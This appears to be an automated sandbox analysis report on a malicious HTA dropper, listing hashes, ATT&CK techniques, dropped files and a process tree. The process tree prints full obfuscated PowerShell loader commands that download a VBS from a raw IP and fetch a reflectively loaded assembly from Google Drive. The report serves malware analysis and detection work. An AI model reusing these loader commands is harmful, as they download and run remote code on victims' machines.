5d06cbde318e42ef7e39a6af52d96576aec4f11477101e4c90718f12c09c5eb4

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
23-10-2024 06:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

greatwayforbestthignswithwhonotwanttodo.hta
Size

130KB
MD5

67a5ad5e7caf5c79cb209e433c345c0b
SHA1

15776cf58dee4ecb7b42b2836539d8d553bf5439
SHA256

5d06cbde318e42ef7e39a6af52d96576aec4f11477101e4c90718f12c09c5eb4
SHA512

b6b697d11dca698441116526bad13c366ba78b477b7489372fff4155a3a06fc49a6487cf2e7a6e33855b7ac7c57dc0c99760a6fe54e77f2b2ec51539a6f5ee96
SSDEEP

192:Ea2xJKbBKWvKbBRWGWiJnKbBxKbBDWNTKbBUT:UWSHWi0yW22

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powERShEll.EXepowershell.exe

flow pid process

4 2640 powERShEll.EXe
6 1164 powershell.exe
8 1164 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2512 powershell.exe
1164 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

powERShEll.EXepowershell.exe

pid process

2640 powERShEll.EXe
2796 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	2640	powERShEll.EXe
6	1164	powershell.exe
8	1164	powershell.exe

pid	process
2512	powershell.exe
1164	powershell.exe

pid	process
2640	powERShEll.EXe
2796	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cvtres.exeWScript.exepowershell.exepowershell.exemshta.exepowERShEll.EXepowershell.execsc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powERShEll.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powERShEll.EXepowershell.exepowershell.exepowershell.exe

pid process

2640 powERShEll.EXe
2796 powershell.exe
2640 powERShEll.EXe
2640 powERShEll.EXe
2512 powershell.exe
1164 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2640	powERShEll.EXe
2796	powershell.exe
2640	powERShEll.EXe
2640	powERShEll.EXe
2512	powershell.exe
1164	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powERShEll.EXepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2640	powERShEll.EXe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exepowERShEll.EXecsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1504 wrote to memory of 2640	1504	mshta.exe	powERShEll.EXe
PID 1504 wrote to memory of 2640	1504	mshta.exe	powERShEll.EXe
PID 1504 wrote to memory of 2640	1504	mshta.exe	powERShEll.EXe
PID 1504 wrote to memory of 2640	1504	mshta.exe	powERShEll.EXe
PID 2640 wrote to memory of 2796	2640	powERShEll.EXe	powershell.exe
PID 2640 wrote to memory of 2796	2640	powERShEll.EXe	powershell.exe
PID 2640 wrote to memory of 2796	2640	powERShEll.EXe	powershell.exe
PID 2640 wrote to memory of 2796	2640	powERShEll.EXe	powershell.exe
PID 2640 wrote to memory of 2844	2640	powERShEll.EXe	csc.exe
PID 2640 wrote to memory of 2844	2640	powERShEll.EXe	csc.exe
PID 2640 wrote to memory of 2844	2640	powERShEll.EXe	csc.exe
PID 2640 wrote to memory of 2844	2640	powERShEll.EXe	csc.exe
PID 2844 wrote to memory of 2980	2844	csc.exe	cvtres.exe
PID 2844 wrote to memory of 2980	2844	csc.exe	cvtres.exe
PID 2844 wrote to memory of 2980	2844	csc.exe	cvtres.exe
PID 2844 wrote to memory of 2980	2844	csc.exe	cvtres.exe
PID 2640 wrote to memory of 2752	2640	powERShEll.EXe	WScript.exe
PID 2640 wrote to memory of 2752	2640	powERShEll.EXe	WScript.exe
PID 2640 wrote to memory of 2752	2640	powERShEll.EXe	WScript.exe
PID 2640 wrote to memory of 2752	2640	powERShEll.EXe	WScript.exe
PID 2752 wrote to memory of 2512	2752	WScript.exe	powershell.exe
PID 2752 wrote to memory of 2512	2752	WScript.exe	powershell.exe
PID 2752 wrote to memory of 2512	2752	WScript.exe	powershell.exe
PID 2752 wrote to memory of 2512	2752	WScript.exe	powershell.exe
PID 2512 wrote to memory of 1164	2512	powershell.exe	powershell.exe
PID 2512 wrote to memory of 1164	2512	powershell.exe	powershell.exe
PID 2512 wrote to memory of 1164	2512	powershell.exe	powershell.exe
PID 2512 wrote to memory of 1164	2512	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatwayforbestthignswithwhonotwanttodo.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Windows\SysWOW64\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe
  "C:\Windows\SySTeM32\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe" "POWerSHELl.EXE -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent ; IeX($(Iex('[sysTEm.TExt.enCODINg]'+[cHaR]58+[chaR]0x3a+'UTF8.GetStRing([sYStEm.cOnvErT]'+[ChaR]0X3A+[chaR]58+'fromBaSe64sTrIng('+[CHar]34+'JEN3a1ZBMXJLTlgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlckRFZmlOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTk9rdSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFF2ZVlheCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNxSk9USUEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidGh1RlpYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEN3a1ZBMXJLTlgxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80Mi9zaW1wbGV0aGluZ3N3aXRoZ3JlYXRmdXR1cmViZXR0ZXJvbmVnZXRiYWNrZm9ybWUudElGIiwiJEVOdjpBUFBEQVRBXHNpbXBsZXRoaW5nc3dpdGhncmVhdGZ1dHVyZWJldHRlcm9uZWdldGJhLnZicyIsMCwwKTtzdEFSVC1TTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaW1wbGV0aGluZ3N3aXRoZ3JlYXRmdXR1cmViZXR0ZXJvbmVnZXRiYS52YnMi'+[cHar]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2796
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE4A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE49.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2980
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnZTZvaW1hZ2VVcmwgPSB6U3JodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB6U3I7ZTZvd2ViQ2xpZW50ID0gTmV3LU9iamVjdCcrJyBTeXN0ZW0uTmV0LldlYkNsaWVudDtlNm9pbWFnZUJ5dGVzID0gZTZvd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShlNm9pbWFnZVVybCk7ZTZvaW1hZ2VUJysnZXh0ID0gW1N5c3RlbS5UJysnZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZTZvaW1hZ2VCeXRlcyk7ZTZvc3RhcnRGbGFnID0gelNyPDxCQVNFNjRfU1RBUlQ+PnpTcjtlNm9lbmRGbGFnID0gelNyPDxCQVNFNjRfRU5EPj56U3I7ZTZvc3RhcnRJbmRleCA9IGU2b2ltYWdlVGV4dC5JbmRleE9mKGU2b3N0YXJ0RmxhZyk7ZTZvJysnZW5kSW5kZXggPSBlNm9pbWFnZVRleHQuSW5kZXhPZihlNm9lbmRGbGFnKTtlNm8nKydzJysndGFydEluZGV4IC1nZSAwIC1hbmQgZTZvZW5kSW5kZXggLWd0IGU2b3N0YXJ0SW5kZXg7ZTZvc3RhcnRJbmRleCArPSBlNm9zdGFydEZsYWcuTGVuZ3RoO2U2b2Jhc2U2NExlbmd0aCA9IGU2b2VuZEluZGV4IC0gZTZvc3RhJysncnRJbmRleDtlNm9iJysnYXNlNjRDb21tYW5kID0gZTZvaScrJ21hZ2VUZXh0LlN1YnN0cmluZygnKydlNm9zdGFydEluZGV4LCBlNm9iYXNlNjRMZW5ndGgnKycpO2U2b2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKGU2b2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYScrJ3koKSAnKydDcHcgRm9yRWFjaCcrJy1PYmplY3QgeyBlNm9fIH0pWy0xLi4tKGU2b2Jhc2U2NENvbW1hbmQnKycuTCcrJ2VuZ3RoKV07ZTZvY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhlNm9iYXNlNjRSZXZlcnNlZCk7ZTZvbG9hZGUnKydkQXNzZW1ibHkgPSBbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2EnKydkKGU2b2NvbW1hbmRCeXRlcyk7ZTZvdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6U3JWQUl6U3InKycpO2U2b3ZhaU1ldGhvZC5JbnZvaycrJ2UoZTZvbnVsbCwgQCh6U3J0eHQuVkdGVkJSUy8yNC8nKycxJysnNDEuNjcnKycxLjMuMjkxLy86cCcrJ3R0aHpTciwgeicrJ1NyZGVzYXRpdmFkb3pTciwgeicrJ1NyZGUnKydzJysnYXRpdmFkb3pTciwgelNyZGVzYXRpdmEnKydkb3pTciwgelNyQ2FzUG9selNyLCB6U3JkZXNhdGl2YWRvelNyLCcrJyB6U3JkZXNhdGl2YWRvelNyLHpTcmRlc2EnKyd0aXZhZG96U3IselNyZGVzYXRpdmFkb3pTcix6U3JkZXNhdGl2JysnYScrJ2RvelNyLHpTcmRlc2F0aXZhZG96U3IselNyZGVzYXQnKydpdmFkb3pTcix6U3IxelNyLHpTcmRlc2F0aXZhZG96U3IpKScrJzsnKS1SZXBsYUNFIChbQ0hhcl0xMjIrW0NIYXJdODMrW0NIYXJdMTE0KSxbQ0hhcl0zOSAtY3JFcExhQ0UnZTZvJyxbQ0hhcl0zNi1SZXBsYUNFIChbQ0hhcl02NytbQ0hhcl0xMTIrW0NIYXJdMTE5KSxbQ0hhcl0xMjQpIHwmICggJHBTaE9tZVsyMV0rJHBzSE9tZVszNF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2512
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('e6oimageUrl = zSrhttps://drive.google.com/uc?export=downloa'+'d&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zSr;e6owebClient = New-Object'+' System.Net.WebClient;e6oimageBytes = e6owebClient.'+'DownloadData(e6oimageUrl);e6oimageT'+'ext = [System.T'+'ext.Encoding]::UTF8.GetString(e6oimageBytes);e6ostartFlag = zSr<<BASE64_START>>zSr;e6oendFlag = zSr<<BASE64_END>>zSr;e6ostartIndex = e6oimageText.IndexOf(e6ostartFlag);e6o'+'endIndex = e6oimageText.IndexOf(e6oendFlag);e6o'+'s'+'tartIndex -ge 0 -and e6oendIndex -gt e6ostartIndex;e6ostartIndex += e6ostartFlag.Length;e6obase64Length = e6oendIndex - e6osta'+'rtIndex;e6ob'+'ase64Command = e6oi'+'mageText.Substring('+'e6ostartIndex, e6obase64Length'+');e6obase64Reversed = -join (e6obase64Command.ToCharArra'+'y() '+'Cpw ForEach'+'-Object { e6o_ })[-1..-(e6obase64Command'+'.L'+'ength)];e6ocommandBytes = [System.Convert]::FromBase64String(e6obase64Reversed);e6oloade'+'dAssembly = [Syst'+'em.Reflection.Assembly]::Loa'+'d(e6ocommandBytes);e6ovaiMethod = [dnlib.IO.Home].GetMethod(zSrVAIzSr'+');e6ovaiMethod.Invok'+'e(e6onull, @(zSrtxt.VGFVBRS/24/'+'1'+'41.67'+'1.3.291//:p'+'tthzSr, z'+'SrdesativadozSr, z'+'Srde'+'s'+'ativadozSr, zSrdesativa'+'dozSr, zSrCasPolzSr, zSrdesativadozSr,'+' zSrdesativadozSr,zSrdesa'+'tivadozSr,zSrdesativadozSr,zSrdesativ'+'a'+'dozSr,zSrdesativadozSr,zSrdesat'+'ivadozSr,zSr1zSr,zSrdesativadozSr))'+';')-ReplaCE ([CHar]122+[CHar]83+[CHar]114),[CHar]39 -crEpLaCE'e6o',[CHar]36-ReplaCE ([CHar]67+[CHar]112+[CHar]119),[CHar]124) |& ( $pShOme[21]+$psHOme[34]+'x')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESAE4A.tmp

Filesize
1KB

MD5
8a1f03435a459a81166ebbe13d365d3f

SHA1
c76c6494d54811a76edce2036dddba96b5404c1f

SHA256
acb0a83823a8bc43b746e1c420206b70a8b021b87b05b91171375b2c130ba599

SHA512
41f64409878256bca8aa57ecc14959893dcd1e01162997a4f37058329b5b45bb1a3826c4296c5befda4e3cfdcd4f6363df9d511225e40d00b2f2b4ce28ca65f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.dll

Filesize
3KB

MD5
2f638fb1eba866d56f423d31451aceb7

SHA1
6f1cc200732d1aced11a3f5284f9d60b16214cd8

SHA256
2309e54db417200c0389403337645efee17787cc5d5958aeaac1a929df4afed7

SHA512
819a38442c6349da4996da547ea4627d91597dd583c449bfd230f056d1597a9eed890ce1e3106b71e76152d20b0158884813e25b41320b837a3cdb2ba0e93e53

Download Submit
C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.pdb

Filesize
7KB

MD5
730303f36c1c128be833bf6234a3a972

SHA1
025a7414d4e5b6d4fe1e38fd24261937749e6c89

SHA256
d34421800a99463f44a470b48bd8037945302abfbb79a6252458a3d63c0b2f1c

SHA512
08ec3777f9895de8868885cd12c59ab622dead4d49984be2f9cde8f33dceb99dc51600d0fdc93302b22c24477f48d9c87a4d210bf805f341f5d737184aec9d37

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b8f489dc283ce131d151cc023dff59bc

SHA1
e81c63d7ff5f9a738ee43290fe0d513b7d3f5b41

SHA256
ae1b74f4367e89e8465eac9b8396e93464dcf2fd61ecd76f0c42a7206d78dbbb

SHA512
31adb7d75d55a9fe72b30bb74d0d326f2f5b959dda9a009acd61fcd8534ed380981b9f8c57315983701843cbf113680e939faada4aba5fc30b5c442fcfb9234e

Download Submit
C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs

Filesize
137KB

MD5
5a9b34ae3fd1ec59f9be56049cdbc50a

SHA1
9a32f9c0054525e2cb7693df834748f8d2960f97

SHA256
dadfc399131b08b48b3b2fbcabbcced43397183a41f9213ca046db03258aa3e3

SHA512
d951e1def250c743f06e1c6e83a837c43457ce37101ef93db5416efb52db8e49b2ab4998489b2b51dd135d04e4e661bf529c5f5da3b1915358dbfc1959d9ec93

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCAE49.tmp

Filesize
652B

MD5
ca4592db77543d4f9b3e08d3cfe0c201

SHA1
3db05ead44a9f8ef703d53f32ea9daa9ba5d0454

SHA256
d81be211b136f1466b37e3077a996919272e5623ca5162ae4d1c71297d69ce90

SHA512
f6dc24b309353262b0db0c5ef564df6a3df44f5ef039b696eff26824e31e7b125607278a9dde67bf06f3967ef64113a136e662776299315c401beb0da70a23e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hgq9bbh1.0.cs

Filesize
459B

MD5
215ff4cb51532af3e78a4f759fc9aa11

SHA1
93b2983039e8a5ca1f4fba93f4d239e48ca38b94

SHA256
182126a701d9770a97367ac204a3e73a1011c253bc8ec5b83b72fac429595641

SHA512
72194a7d39a43d0bc2fbac563b102b28c942cc561e631e35f8324ca54d8d775c529b22eba6655f5fdb65d367e3a864ecc371423e1c2c7e7b62a8b8f7c191fd97

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hgq9bbh1.cmdline

Filesize
309B

MD5
bc9fa7f3785f09ee341584ad4c80e23a

SHA1
2c890c5ae3138ee02a4c3c4944a8ece79c13b79c

SHA256
b37dfbf32a7d694543619b8a006cec5d3785277664833f52da7afd82f2038793

SHA512
549ace95b6de70e1ae390e0aec15101bd31edcb09e295e534d19bf899d8eaf8c1564ea8d9b72b280e8c02ee0304af0b65da23c7ad97c4f68d6585638643d46a9

Download Submit